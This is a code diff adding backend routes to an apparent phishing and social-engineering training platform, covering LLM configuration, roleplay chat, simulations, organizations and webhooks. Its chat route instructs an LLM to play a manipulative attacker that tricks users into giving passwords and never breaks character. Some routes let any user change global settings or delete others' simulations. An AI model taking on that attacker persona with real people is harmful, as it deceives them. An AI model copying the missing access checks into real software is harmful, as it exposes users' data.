local/openrouter).""" + if provider == "local": + url = base_url or LOCAL_DEFAULTS["ollama"] + models = await fetch_local_models(url) + return {"provider": provider, "models": models, "base_url": url} + + if provider == "openrouter": + config = await db.llm_configs.find_one({"provider": "openrouter"}, {"_id": 0}) + api_key = config.get("api_key", "") if config else "" + models = await fetch_openrouter_models(api_key) + return {"provider": provider, "models": models[:100], "total": len(models)} + + return {"provider": provider, "models": get_provider_models(provider)} + + +# ==================== CONFIG CRUD ==================== + + +@router.get("/config") +async def get_llm_configs(current_user: User = Depends(get_current_user)): + configs = await db.llm_configs.find({}, {"_id": 0}).to_list(100) + active_configs = [] + for config in configs: + # For local, api_key might be empty - that's OK + if config.get("provider") != "local" and ( + not config.get("api_key") or config.get("api_key") == "" + ): + continue + if config.get("api_key"): + config["api_key"] = "***" + config["updated_at"] = config.get("updated_at", datetime.now(UTC).isoformat()) + active_configs.append(config) + return active_configs + + +@router.post("/config") +async def save_llm_config(config: LLMConfig, current_user: User = Depends(get_current_user)): + doc = config.model_dump() + doc["updated_at"] = doc["updated_at"].isoformat() + + # For local provider, api_key is optional + if config.provider != "local" and (not config.api_key or config.api_key == ""): + await db.llm_configs.delete_one({"provider": config.provider}) + return {"message": "LLM config deleted"} + + await db.llm_configs.update_one( + {"provider": config.provider}, + {"$set": doc}, + upsert=True, + ) + + return {"message": "LLM config saved", "provider": config.provider, "model": config.model_name} + + +# ==================== GENERATION & CHAT ==================== + + +@router.post("/generate") +async def generate_pretext(request: dict[str, Any], current_user: User = Depends(get_current_user)): + """Generate pretext using LLM.""" + requested_provider = request.get("provider", None) + prompt = request.get("prompt", "") + context = request.get("context", {}) + + if requested_provider: + config = await db.llm_configs.find_one( + {"provider": requested_provider, "enabled": True}, {"_id": 0} + ) + else: + config = await db.llm_configs.find_one({"enabled": True}, {"_id": 0}) + + if not config: + raise HTTPException( + status_code=400, + detail="LLM provider not configured or not enabled. Please configure in Settings.", + ) + + try: + response = await get_llm_generate_model(config, prompt, context) + sanitized = repair_json(response.content) + return { + "generated_text": sanitized, + "provider": config["provider"], + "model": config.get("model_name"), + } + + except Exception as e: + logger.error(f"LLM generation failed: {e}") + error_msg = str(e) + if "NOT_FOUND" in error_msg: + error_msg = ( + "Model not found. Your API Key might not support the selected model, " + "or the region is restricted." + ) + raise HTTPException(status_code=500, detail=f"LLM Generation Error: {error_msg}") + + +@router.post("/chat") +async def chat_interaction(request: dict[str, Any], current_user: User = Depends(get_current_user)): + """Real-time Chat Interaction for Roleplay.""" + history = request.get("history", []) + persona = request.get("persona", {}) + user_message = request.get("message", "") + + config = await db.llm_configs.find_one({"enabled": True}, {"_id": 0}) + if not config: + raise HTTPException( + status_code=400, + detail="LLM config missing. Configure a provider in Settings.", + ) + + system_prompt = f"""You are a roleplay actor in a cybersecurity simulation. + Role: {persona.get("name", "Attacker")} + Goal: {persona.get("goal", "Trick the user")} + Personality: {persona.get("style", "Manipulative")} + Context: {persona.get("context", "Corporate Environment")} + + INSTRUCTIONS: + 1. Respond naturally as your character. Short, realistic messages (whatsapp/email style). + 2. Do NOT break character. + 3. If the user successfully spots the attack or refuses securely, + react accordingly (e.g. get angry, give up, or try a different angle). + 4. If the user FAILS (gives password, clicks link), + output a special marker in your text: [SUCCESS_ATTACK]. + 5. If the user permanently BLOCKS the attack, output: [ATTACK_FAILED]. + """ + + messages = [SystemMessage(content=system_prompt)] + + for msg in history: + if msg["role"] == "user": + messages.append(HumanMessage(content=msg["content"])) + elif msg["role"] == "assistant": + messages.append(AIMessage(content=msg["content"])) + + messages.append(HumanMessage(content=user_message)) + + try: + response = await get_llm_chat_model(config, messages) + content = response.content + + status = "ongoing" + if "[SUCCESS_ATTACK]" in content: + status = "failed" + content = content.replace("[SUCCESS_ATTACK]", "") + elif "[ATTACK_FAILED]" in content: + status = "completed" + content = content.replace("[ATTACK_FAILED]", "") + + return { + "role": "assistant", + "content": content, + "status": status, + "provider": config["provider"], + "model": config.get("model_name"), + } + + except Exception as e: + logger.error(f"Chat error: {e}") + error_msg = str(e) + provider = config["provider"] + if "401" in error_msg: + error_msg = f"Unauthorized. Please check your API Key for {provider}." + elif "404" in error_msg: + error_msg = f"Model Not Found. Provider: {provider}." + elif "429" in error_msg: + error_msg = f"Rate Limit Exceeded. Please try again later. Provider: {provider}." + elif "Connection" in error_msg or "connect" in error_msg.lower(): + error_msg = f"Connection failed for {provider}. Is the server running?" + raise HTTPException(status_code=500, detail=error_msg) diff --git a/backend/routes/notifications.py b/backend/routes/notifications.py new file mode 100644 index 0000000..f0ec687 --- /dev/null +++ b/backend/routes/notifications.py @@ -0,0 +1,49 @@ +from fastapi import APIRouter, Depends, Query + +from models.schemas import User +from services.auth import get_current_user +from services.database import db + +router = APIRouter(prefix="/notifications", tags=["notifications"]) + + +@router.get("") +async def get_notifications( + unread_only: bool = Query(False), + limit: int = Query(50, le=100), + current_user: User = Depends(get_current_user), +): + """Get user notifications.""" + query = {"user_id": current_user.id} + if unread_only: + query["read"] = False + + notifications = ( + await db.notifications.find(query, {"_id": 0}).sort("created_at", -1).to_list(limit) + ) + + unread_count = await db.notifications.count_documents( + {"user_id": current_user.id, "read": False} + ) + + return {"notifications": notifications, "unread_count": unread_count} + + +@router.put("/{notification_id}/read") +async def mark_read(notification_id: str, current_user: User = Depends(get_current_user)): + """Mark a notification as read.""" + await db.notifications.update_one( + {"id": notification_id, "user_id": current_user.id}, + {"$set": {"read": True}}, + ) + return {"message": "Marked as read"} + + +@router.put("/read-all") +async def mark_all_read(current_user: User = Depends(get_current_user)): + """Mark all notifications as read.""" + await db.notifications.update_many( + {"user_id": current_user.id, "read": False}, + {"$set": {"read": True}}, + ) + return {"message": "All notifications marked as read"} diff --git a/backend/routes/organizations.py b/backend/routes/organizations.py new file mode 100644 index 0000000..312d6af --- /dev/null +++ b/backend/routes/organizations.py @@ -0,0 +1,121 @@ +from typing import Any + +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import Organization, User +from services.auth import get_current_user +from services.database import db + +router = APIRouter(prefix="/organizations", tags=["organizations"]) + + +@router.post("") +async def create_organization(data: dict[str, Any], current_user: User = Depends(get_current_user)): + """Create a new organization.""" + org = Organization( + name=data["name"], + description=data.get("description", ""), + owner_id=current_user.id, + member_ids=[current_user.id], + ) + doc = org.model_dump() + doc["created_at"] = doc["created_at"].isoformat() + await db.organizations.insert_one(doc) + + # Update user's org + await db.users.update_one( + {"id": current_user.id}, + {"$set": {"organization_id": org.id, "role": "admin"}}, + ) + + # Award team player badge + if "team_player" not in current_user.badges: + from services.gamification import award_xp + + await db.users.update_one({"id": current_user.id}, {"$addToSet": {"badges": "team_player"}}) + await award_xp(current_user.id, 50) + + return {"id": org.id, "invite_code": org.invite_code, "message": "Organization created"} + + +@router.get("/mine") +async def get_my_organization(current_user: User = Depends(get_current_user)): + """Get current user's organization.""" + if not current_user.organization_id: + return None + + org = await db.organizations.find_one({"id": current_user.organization_id}, {"_id": 0}) + if not org: + return None + + # Get member details + members = await db.users.find( + {"id": {"$in": org.get("member_ids", [])}}, + {"_id": 0, "password_hash": 0}, + ).to_list(100) + + org["members"] = [ + { + "id": m["id"], + "username": m.get("username"), + "display_name": m.get("display_name"), + "role": m.get("role", "trainee"), + "level": m.get("level", 1), + "xp": m.get("xp", 0), + } + for m in members + ] + + return org + + +@router.post("/join") +async def join_organization(data: dict[str, Any], current_user: User = Depends(get_current_user)): + """Join an organization via invite code.""" + invite_code = data.get("invite_code", "") + org = await db.organizations.find_one({"invite_code": invite_code}, {"_id": 0}) + if not org: + raise HTTPException(status_code=404, detail="Invalid invite code") + + if current_user.id in org.get("member_ids", []): + raise HTTPException(status_code=400, detail="Already a member") + + await db.organizations.update_one( + {"id": org["id"]}, + {"$addToSet": {"member_ids": current_user.id}}, + ) + await db.users.update_one( + {"id": current_user.id}, + {"$set": {"organization_id": org["id"]}}, + ) + + # Award badge + if "team_player" not in current_user.badges: + from services.gamification import award_xp + + await db.users.update_one({"id": current_user.id}, {"$addToSet": {"badges": "team_player"}}) + await award_xp(current_user.id, 50) + + return {"message": f"Joined {org['name']}", "organization_id": org["id"]} + + +@router.delete("/leave") +async def leave_organization(current_user: User = Depends(get_current_user)): + """Leave current organization.""" + if not current_user.organization_id: + raise HTTPException(status_code=400, detail="Not in an organization") + + org = await db.organizations.find_one({"id": current_user.organization_id}, {"_id": 0}) + if org and org.get("owner_id") == current_user.id: + raise HTTPException(status_code=400, detail="Owner cannot leave. Transfer ownership first.") + + await db.organizations.update_one( + {"id": current_user.organization_id}, + {"$pull": {"member_ids": current_user.id}}, + ) + await db.users.update_one( + {"id": current_user.id}, + {"$set": {"organization_id": None}}, + ) + + return {"message": "Left organization"} diff --git a/backend/routes/quizzes.py b/backend/routes/quizzes.py new file mode 100644 index 0000000..d8e3b03 --- /dev/null +++ b/backend/routes/quizzes.py @@ -0,0 +1,21 @@ +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import Quiz, User +from services.auth import get_current_user +from services.database import db + +router = APIRouter(prefix="/quizzes", tags=["quizzes"]) + + +@router.get("", response_model=list[Quiz]) +async def get_quizzes(current_user: User = Depends(get_current_user)): + quizzes = await db.quizzes.find({}, {"_id": 0}).to_list(1000) + return quizzes + + +@router.get("/{quiz_id}", response_model=Quiz) +async def get_quiz(quiz_id: str, current_user: User = Depends(get_current_user)): + quiz = await db.quizzes.find_one({"id": quiz_id}, {"_id": 0}) + if not quiz: + raise HTTPException(status_code=404, detail="Quiz not found") + return quiz diff --git a/backend/routes/reports.py b/backend/routes/reports.py new file mode 100644 index 0000000..f924740 --- /dev/null +++ b/backend/routes/reports.py @@ -0,0 +1,26 @@ +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import User +from services.auth import get_current_user +from services.database import db +from services.scoring import calculate_susceptibility_score + +router = APIRouter(prefix="/reports", tags=["reports"]) + + +@router.get("/{simulation_id}/json") +async def get_report_json(simulation_id: str, current_user: User = Depends(get_current_user)): + sim = await db.simulations.find_one({"id": simulation_id}, {"_id": 0}) + if not sim: + raise HTTPException(status_code=404, detail="Simulation not found") + + score_data = calculate_susceptibility_score(sim) + + return { + "simulation_id": simulation_id, + "score": score_data, + "events": sim.get("events", []), + "started_at": sim.get("started_at"), + "completed_at": sim.get("completed_at"), + "participant_name": sim.get("participant_name"), + } diff --git a/backend/routes/scenario_builder.py b/backend/routes/scenario_builder.py new file mode 100644 index 0000000..3d94140 --- /dev/null +++ b/backend/routes/scenario_builder.py @@ -0,0 +1,129 @@ +from datetime import UTC, datetime +from typing import Any + +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import Challenge, ScenarioTemplate, User +from services.auth import get_current_user +from services.database import db +from services.gamification import award_xp + +router = APIRouter(prefix="/scenario-builder", tags=["scenario-builder"]) + + +@router.get("/templates") +async def get_my_templates(current_user: User = Depends(get_current_user)): + """Get user's scenario templates (drafts and published).""" + templates = ( + await db.scenario_templates.find({"created_by": current_user.id}, {"_id": 0}) + .sort("updated_at", -1) + .to_list(100) + ) + return templates + + +@router.get("/templates/{template_id}") +async def get_template(template_id: str, current_user: User = Depends(get_current_user)): + """Get a specific template.""" + template = await db.scenario_templates.find_one({"id": template_id}, {"_id": 0}) + if not template: + raise HTTPException(status_code=404, detail="Template not found") + return template + + +@router.post("/templates") +async def create_template(data: dict[str, Any], current_user: User = Depends(get_current_user)): + """Create a new scenario template (draft).""" + template = ScenarioTemplate( + title=data.get("title", "Untitled Scenario"), + description=data.get("description", ""), + difficulty=data.get("difficulty", "medium"), + cialdini_categories=data.get("cialdini_categories", []), + channel=data.get("channel", "email_inbox"), + nodes=data.get("nodes", []), + metadata=data.get("metadata", {}), + content_en=data.get("content_en"), + content_id=data.get("content_id"), + created_by=current_user.id, + ) + doc = template.model_dump() + doc["created_at"] = doc["created_at"].isoformat() + doc["updated_at"] = doc["updated_at"].isoformat() + await db.scenario_templates.insert_one(doc) + return {"id": template.id, "message": "Template created"} + + +@router.put("/templates/{template_id}") +async def update_template( + template_id: str, data: dict[str, Any], current_user: User = Depends(get_current_user) +): + """Update a scenario template.""" + existing = await db.scenario_templates.find_one( + {"id": template_id, "created_by": current_user.id} + ) + if not existing: + raise HTTPException(status_code=404, detail="Template not found") + + data["updated_at"] = datetime.now(UTC).isoformat() + await db.scenario_templates.update_one({"id": template_id}, {"$set": data}) + return {"message": "Template updated"} + + +@router.delete("/templates/{template_id}") +async def delete_template(template_id: str, current_user: User = Depends(get_current_user)): + """Delete a scenario template.""" + result = await db.scenario_templates.delete_one( + {"id": template_id, "created_by": current_user.id} + ) + if result.deleted_count == 0: + raise HTTPException(status_code=404, detail="Template not found") + return {"message": "Template deleted"} + + +@router.post("/templates/{template_id}/publish") +async def publish_template(template_id: str, current_user: User = Depends(get_current_user)): + """Publish a template as a playable challenge.""" + template = await db.scenario_templates.find_one( + {"id": template_id, "created_by": current_user.id}, {"_id": 0} + ) + if not template: + raise HTTPException(status_code=404, detail="Template not found") + + if not template.get("nodes") or len(template["nodes"]) < 2: + raise HTTPException(status_code=400, detail="Scenario must have at least 2 nodes") + + # Create a challenge from the template + challenge = Challenge( + title=template["title"], + description=template["description"], + difficulty=template["difficulty"], + cialdini_categories=template.get("cialdini_categories", []), + estimated_time=len(template.get("nodes", [])) * 2, + nodes=template["nodes"], + metadata={ + **template.get("metadata", {}), + "author": current_user.username, + "source": "scenario_builder", + "template_id": template_id, + }, + content_en=template.get("content_en"), + content_id=template.get("content_id"), + ) + doc = challenge.model_dump() + doc["created_at"] = doc["created_at"].isoformat() + await db.challenges.insert_one(doc) + + # Mark template as published + await db.scenario_templates.update_one( + {"id": template_id}, + {"$set": {"is_published": True, "is_draft": False}}, + ) + + # Award badge + if "scenario_creator" not in current_user.badges: + await db.users.update_one( + {"id": current_user.id}, {"$addToSet": {"badges": "scenario_creator"}} + ) + await award_xp(current_user.id, 200) + + return {"challenge_id": challenge.id, "message": "Scenario published as challenge!"} diff --git a/backend/routes/settings.py b/backend/routes/settings.py new file mode 100644 index 0000000..4b71b16 --- /dev/null +++ b/backend/routes/settings.py @@ -0,0 +1,28 @@ +from typing import Any + +from fastapi import APIRouter, Depends + +from models.schemas import Settings, User +from services.auth import get_current_user +from services.database import db + +router = APIRouter(prefix="/settings", tags=["settings"]) + + +@router.get("", response_model=Settings) +async def get_settings(current_user: User = Depends(get_current_user)): + settings = await db.settings.find_one({"id": "settings"}, {"_id": 0}) + if not settings: + settings = Settings().model_dump() + await db.settings.insert_one(settings) + return settings + + +@router.put("") +async def update_settings(updates: dict[str, Any], current_user: User = Depends(get_current_user)): + await db.settings.update_one( + {"id": "settings"}, + {"$set": updates}, + upsert=True, + ) + return {"message": "Settings updated"} diff --git a/backend/routes/simulations.py b/backend/routes/simulations.py new file mode 100644 index 0000000..5444657 --- /dev/null +++ b/backend/routes/simulations.py @@ -0,0 +1,59 @@ +from datetime import UTC, datetime +from typing import Any + +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import Simulation, User +from services.auth import get_current_user +from services.database import db + +router = APIRouter(prefix="/simulations", tags=["simulations"]) + + +@router.post("") +async def create_simulation(simulation: Simulation, current_user: User = Depends(get_current_user)): + doc = simulation.model_dump() + doc["started_at"] = doc["started_at"].isoformat() + if doc.get("completed_at"): + doc["completed_at"] = doc["completed_at"].isoformat() + await db.simulations.insert_one(doc) + return {"id": simulation.id, "status": "created"} + + +@router.get("", response_model=list[Simulation]) +async def get_simulations(current_user: User = Depends(get_current_user)): + sims = await db.simulations.find({}, {"_id": 0}).sort("started_at", -1).to_list(100) + return sims + + +@router.get("/{simulation_id}", response_model=Simulation) +async def get_simulation(simulation_id: str, current_user: User = Depends(get_current_user)): + sim = await db.simulations.find_one({"id": simulation_id}, {"_id": 0}) + if not sim: + raise HTTPException(status_code=404, detail="Simulation not found") + return sim + + +@router.put("/{simulation_id}") +async def update_simulation( + simulation_id: str, updates: dict[str, Any], current_user: User = Depends(get_current_user) +): + if updates.get("completed_at"): + updates["completed_at"] = datetime.now(UTC).isoformat() + + result = await db.simulations.update_one({"id": simulation_id}, {"$set": updates}) + + if result.matched_count == 0: + raise HTTPException(status_code=404, detail="Simulation not found") + + return {"message": "Simulation updated"} + + +@router.delete("/{simulation_id}") +async def delete_simulation(simulation_id: str, current_user: User = Depends(get_current_user)): + result = await db.simulations.delete_one({"id": simulation_id}) + + if result.deleted_count == 0: + raise HTTPException(status_code=404, detail="Simulation not found") + + return {"message": "Simulation deleted successfully"} diff --git a/backend/routes/webhooks.py b/backend/routes/webhooks.py new file mode 100644 index 0000000..acaf08f --- /dev/null +++ b/backend/routes/webhooks.py @@ -0,0 +1,87 @@ +import logging +from typing import Any + +import httpx +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import User, WebhookConfig +from services.auth import get_current_user +from services.database import db + +logger = logging.getLogger(__name__) + +router = APIRouter(prefix="/webhooks", tags=["webhooks"]) + + +@router.get("") +async def get_webhooks(current_user: User = Depends(get_current_user)): + """List configured webhooks.""" + if current_user.role not in ("admin", "instructor"): + raise HTTPException(status_code=403, detail="Insufficient permissions") + + query = {} + if current_user.organization_id: + query["organization_id"] = current_user.organization_id + + webhooks = await db.webhooks.find(query, {"_id": 0}).to_list(50) + # Mask secrets + for wh in webhooks: + if wh.get("secret"): + wh["secret"] = "***" + return webhooks + + +@router.post("") +async def create_webhook(data: dict[str, Any], current_user: User = Depends(get_current_user)): + """Create a webhook configuration.""" + if current_user.role not in ("admin", "instructor"): + raise HTTPException(status_code=403, detail="Insufficient permissions") + + webhook = WebhookConfig( + name=data["name"], + url=data["url"], + events=data.get("events", ["simulation_complete"]), + secret=data.get("secret"), + organization_id=current_user.organization_id, + ) + doc = webhook.model_dump() + doc["created_at"] = doc["created_at"].isoformat() + await db.webhooks.insert_one(doc) + return {"id": webhook.id, "message": "Webhook created"} + + +@router.delete("/{webhook_id}") +async def delete_webhook(webhook_id: str, current_user: User = Depends(get_current_user)): + """Delete a webhook.""" + if current_user.role not in ("admin", "instructor"): + raise HTTPException(status_code=403, detail="Insufficient permissions") + + result = await db.webhooks.delete_one({"id": webhook_id}) + if result.deleted_count == 0: + raise HTTPException(status_code=404, detail="Webhook not found") + return {"message": "Webhook deleted"} + + +async def fire_webhooks(event: str, payload: dict[str, Any], organization_id: str = None): + """Fire all matching webhooks for an event.""" + query = {"enabled": True, "events": event} + if organization_id: + query["organization_id"] = organization_id + + webhooks = await db.webhooks.find(query, {"_id": 0}).to_list(50) + + for wh in webhooks: + try: + async with httpx.AsyncClient(timeout=10) as client: + headers = {"Content-Type": "application/json"} + if wh.get("secret"): + headers["X-Webhook-Secret"] = wh["secret"] + + await client.post( + wh["url"], + json={"event": event, "data": payload}, + headers=headers, + ) + logger.info(f"Webhook fired: {wh['name']} -> {event}") + except Exception as e: + logger.error(f"Webhook failed: {wh['name']} -> {e}") diff --git a/backend/scripts/drop_yaml.py b/backend/scripts/drop_yaml.py index cd83320..e74b0f0 100644 --- a/backend/scripts/drop_yaml.py +++ b/backend/scripts/drop_yaml.py @@ -3,12 +3,14 @@ Script untuk menghapus (drop) koleksi-koleksi utama di MongoDB. Digunakan untuk membersihkan data aplikasi sebelum menjalankan seeding baru. """ + +import asyncio import os import sys -import asyncio from pathlib import Path -from motor.motor_asyncio import AsyncIOMotorClient + from dotenv import load_dotenv +from motor.motor_asyncio import AsyncIOMotorClient # Tambahkan direktori induk ke path untuk memastikan impor berfungsi sys.path.insert(0, str(Path(__file__).parent.parent)) @@ -17,19 +19,16 @@ load_dotenv() # Daftar koleksi yang akan dihapus -COLLECTIONS_TO_DROP = [ - "challenges", - "quizzes", - "simulations" -] +COLLECTIONS_TO_DROP = ["challenges", "quizzes", "simulations"] + async def drop_collections(): """Menghubungkan ke MongoDB dan menghapus koleksi yang ditentukan.""" try: # Dapatkan variabel lingkungan yang diperlukan - mongo_url = os.environ.get('MONGO_URL') - db_name = os.environ.get('DB_NAME') - + mongo_url = os.environ.get("MONGO_URL") + db_name = os.environ.get("DB_NAME") + if not mongo_url or not db_name: print("โŒ Error: MONGO_URL atau DB_NAME tidak ditemukan di environment variables.") sys.exit(1) @@ -37,7 +36,7 @@ async def drop_collections(): print(f"๐Ÿ”— Menghubungkan ke MongoDB di: {mongo_url}") client = AsyncIOMotorClient(mongo_url) db = client[db_name] - + print(f"๐Ÿ—‘๏ธ Memulai penghapusan koleksi dari database '{db_name}'...") success_count = 0 @@ -50,14 +49,18 @@ async def drop_collections(): success_count += 1 else: print(f"โžก๏ธ Koleksi '{collection_name}' tidak ditemukan, dilewati.") - - print(f"\nโœจ Selesai. Total {success_count}/{len(COLLECTIONS_TO_DROP)} koleksi utama telah dihapus.") - + + print( + f"\nโœจ Selesai. Total {success_count}/" + f"{len(COLLECTIONS_TO_DROP)} koleksi utama telah dihapus." + ) + client.close() - + except Exception as e: print(f"โŒ Terjadi kesalahan fatal selama operasi MongoDB: {e}") sys.exit(1) + if __name__ == "__main__": - asyncio.run(drop_collections()) \ No newline at end of file + asyncio.run(drop_collections()) diff --git a/backend/scripts/import_yaml.py b/backend/scripts/import_yaml.py index 107bf8f..32e87d1 100644 --- a/backend/scripts/import_yaml.py +++ b/backend/scripts/import_yaml.py @@ -2,14 +2,16 @@ """ Import YAML challenges and quizzes into MongoDB """ -import sys -import os -import yaml + import asyncio +import os +import sys +import uuid +from datetime import UTC, datetime from pathlib import Path + +import yaml from motor.motor_asyncio import AsyncIOMotorClient -from datetime import datetime, timezone -import uuid # Add parent directory to path sys.path.insert(0, str(Path(__file__).parent.parent)) @@ -19,84 +21,87 @@ # Load environment load_dotenv() + async def import_yaml_file(file_path: Path, db): """Import a single YAML file""" try: - with open(file_path, 'r', encoding='utf-8') as f: + with open(file_path, encoding="utf-8") as f: data = yaml.safe_load(f) - - yaml_type = data.get('type') - + + yaml_type = data.get("type") + if not yaml_type: print(f"โŒ {file_path.name}: No 'type' field") return False - + # Add ID and timestamp - data['id'] = str(uuid.uuid4()) - data['created_at'] = datetime.now(timezone.utc).isoformat() - - if yaml_type == 'challenge': + data["id"] = str(uuid.uuid4()) + data["created_at"] = datetime.now(UTC).isoformat() + + if yaml_type == "challenge": await db.challenges.insert_one(data) print(f"โœ… Challenge: {data.get('title', 'Unknown')}") return True - - elif yaml_type == 'quiz': + + elif yaml_type == "quiz": await db.quizzes.insert_one(data) print(f"โœ… Quiz: {data.get('title', 'Unknown')}") return True - + else: print(f"โŒ {file_path.name}: Unknown type '{yaml_type}'") return False - + except Exception as e: print(f"โŒ {file_path.name}: {str(e)}") return False + async def main(): # Connect to MongoDB - mongo_url = os.environ['MONGO_URL'] - db_name = os.environ['DB_NAME'] - + mongo_url = os.environ["MONGO_URL"] + db_name = os.environ["DB_NAME"] + client = AsyncIOMotorClient(mongo_url) db = client[db_name] - + # Get YAML directory if len(sys.argv) > 1: yaml_dir = Path(sys.argv[1]) else: - yaml_dir = Path(__file__).parent.parent.parent / 'data' / 'sample' - + yaml_dir = Path(__file__).parent.parent.parent / "data" / "sample" + if not yaml_dir.exists(): print(f"โŒ Directory not found: {yaml_dir}") sys.exit(1) - + # Find all YAML files - yaml_files = list(yaml_dir.glob('*.yaml')) + list(yaml_dir.glob('*.yml')) - + yaml_files = list(yaml_dir.glob("*.yaml")) + list(yaml_dir.glob("*.yml")) + if not yaml_files: print(f"โŒ No YAML files found in {yaml_dir}") sys.exit(1) - + print(f"\n๐Ÿ” Found {len(yaml_files)} YAML files\n") - + # Import each file success_count = 0 for yaml_file in sorted(yaml_files): if await import_yaml_file(yaml_file, db): success_count += 1 - + print(f"\nโœ… Imported {success_count}/{len(yaml_files)} files\n") - + # Show stats challenge_count = await db.challenges.count_documents({}) quiz_count = await db.quizzes.count_documents({}) - - print(f"๐Ÿ“Š Database stats:") + + print("๐Ÿ“Š Database stats:") print(f" Challenges: {challenge_count}") print(f" Quizzes: {quiz_count}") - + client.close() -if __name__ == '__main__': + +if __name__ == "__main__": asyncio.run(main()) diff --git a/backend/scripts/simple_import.py b/backend/scripts/simple_import.py index f0384b0..75b91ad 100644 --- a/backend/scripts/simple_import.py +++ b/backend/scripts/simple_import.py @@ -1,33 +1,37 @@ -import sys -import os -import yaml import asyncio -from pathlib import Path -from motor.motor_asyncio import AsyncIOMotorClient +import datetime as dt +import os +import sys import uuid from datetime import datetime -import datetime as dt +from pathlib import Path + +import yaml +from motor.motor_asyncio import AsyncIOMotorClient + async def import_yaml_file(file_path: Path, db): try: - with open(file_path, 'r', encoding='utf-8') as f: + with open(file_path, encoding="utf-8") as f: data = yaml.safe_load(f) - - yaml_type = data.get('type') + + yaml_type = data.get("type") if not yaml_type: print(f"[ERROR] {file_path.name}: No 'type' field") return False - - # Add ID if not present (or overwrite to ensure uniqueness if needed, but keeping existing ID is better if simulating updates) + + # Add ID if not present (or overwrite to ensure + # uniqueness if needed, but keeping existing ID is + # better if simulating updates) # For now, just generate new ID to be safe - data['id'] = str(uuid.uuid4()) - data['created_at'] = datetime.now(dt.timezone.utc).isoformat() - - if yaml_type == 'challenge': + data["id"] = str(uuid.uuid4()) + data["created_at"] = datetime.now(dt.UTC).isoformat() + + if yaml_type == "challenge": await db.challenges.insert_one(data) print(f"[OK] Challenge: {data.get('title', 'Unknown')}") return True - elif yaml_type == 'quiz': + elif yaml_type == "quiz": await db.quizzes.insert_one(data) print(f"[OK] Quiz: {data.get('title', 'Unknown')}") return True @@ -38,35 +42,37 @@ async def import_yaml_file(file_path: Path, db): print(f"[ERROR] {file_path.name}: {str(e)}") return False + async def main(): mongo_url = os.environ.get("MONGO_URL", "mongodb://localhost:27017") db_name = os.environ.get("DB_NAME", "Pretexta") - + print(f"Connecting to {mongo_url}/{db_name}...") client = AsyncIOMotorClient(mongo_url) db = client[db_name] - + # Target directory: relative to this script in backend/scripts -> ../../data/professionals # Script is in backend/scripts base_dir = Path(__file__).parent.parent.parent - yaml_dir = base_dir / 'data' / 'professionals' - + yaml_dir = base_dir / "data" / "professionals" + if not yaml_dir.exists(): print(f"Directory not found: {yaml_dir}") return - files = list(yaml_dir.glob('**/*.yaml')) + files = list(yaml_dir.glob("**/*.yaml")) print(f"Found {len(files)} YAML files.") - + count = 0 for f in files: if await import_yaml_file(f, db): count += 1 - + print(f"Imported {count} files.") client.close() -if __name__ == '__main__': + +if __name__ == "__main__": # Force utf-8 output for windows - sys.stdout.reconfigure(encoding='utf-8') + sys.stdout.reconfigure(encoding="utf-8") asyncio.run(main()) diff --git a/backend/scripts/validate_yaml.py b/backend/scripts/validate_yaml.py index 9832cb8..52b4f99 100644 --- a/backend/scripts/validate_yaml.py +++ b/backend/scripts/validate_yaml.py @@ -1,18 +1,20 @@ -import sys -import yaml import json +import sys from pathlib import Path -from jsonschema import validate, exceptions + +import yaml +from jsonschema import exceptions, validate # Lokasi skema diasumsikan berada di direktori yang sama dengan script ini SCHEMA_DIR = Path(__file__).parent -CHALLENGE_SCHEMA_PATH = SCHEMA_DIR / 'challenge_schema.json' -QUIZ_SCHEMA_PATH = SCHEMA_DIR / 'quiz_schema.json' +CHALLENGE_SCHEMA_PATH = SCHEMA_DIR / "challenge_schema.json" +QUIZ_SCHEMA_PATH = SCHEMA_DIR / "quiz_schema.json" + def load_schema(schema_path: Path): """Memuat skema JSON dari file.""" try: - with open(schema_path, 'r', encoding='utf-8') as f: + with open(schema_path, encoding="utf-8") as f: return json.load(f) except FileNotFoundError: print(f"โŒ Error: Skema tidak ditemukan di {schema_path}. Pastikan file skema JSON ada.") @@ -21,6 +23,7 @@ def load_schema(schema_path: Path): print(f"โŒ Error saat memuat skema JSON dari {schema_path}: {e}") sys.exit(1) + def validate_yaml_file(yaml_file_path: Path): """Memuat dan memvalidasi file YAML terhadap skema yang sesuai.""" if not yaml_file_path.exists(): @@ -28,24 +31,30 @@ def validate_yaml_file(yaml_file_path: Path): sys.exit(1) try: - with open(yaml_file_path, 'r', encoding='utf-8') as f: + with open(yaml_file_path, encoding="utf-8") as f: data = yaml.safe_load(f) except yaml.YAMLError as e: - print(f"โŒ Error: Gagal mem-parsing file YAML '{yaml_file_path.name}'. Sintaks YAML tidak valid.") + print( + f"โŒ Error: Gagal mem-parsing file YAML " + f"'{yaml_file_path.name}'. Sintaks YAML tidak valid." + ) print(f"Detail: {e}") sys.exit(1) # 1. Tentukan Tipe dan Skema - yaml_type = data.get('type') - - if yaml_type == 'challenge': + yaml_type = data.get("type") + + if yaml_type == "challenge": schema = load_schema(CHALLENGE_SCHEMA_PATH) schema_name = "Challenge" - elif yaml_type == 'quiz': + elif yaml_type == "quiz": schema = load_schema(QUIZ_SCHEMA_PATH) schema_name = "Quiz" else: - print(f"โŒ Error: File '{yaml_file_path.name}' tidak memiliki field 'type' atau nilainya bukan 'challenge' atau 'quiz'.") + print( + f"โŒ Error: File '{yaml_file_path.name}' tidak memiliki " + f"field 'type' atau nilainya bukan 'challenge' atau 'quiz'." + ) sys.exit(1) print(f"๐Ÿ” Memvalidasi file '{yaml_file_path.name}' sebagai tipe '{schema_name}'...") @@ -53,9 +62,9 @@ def validate_yaml_file(yaml_file_path: Path): # 2. Jalankan Validasi Skema try: validate(instance=data, schema=schema) - + # 3. Validasi Tambahan (Cross-field logic - Challenge) - if yaml_type == 'challenge': + if yaml_type == "challenge": validate_challenge_nodes(data) print(f"\nโœ… VALIDASI BERHASIL untuk '{yaml_file_path.name}'!") @@ -69,7 +78,7 @@ def validate_yaml_file(yaml_file_path: Path): # Menampilkan path yang jelas ke properti yang bermasalah path_segments = [str(p) for p in e.absolute_path] error_path = ".".join(path_segments) if path_segments else "[root]" - + print(f"Path Bermasalah: {error_path}") print(f"Pesan Error: {e.message}") print("-" * 30) @@ -82,32 +91,36 @@ def validate_yaml_file(yaml_file_path: 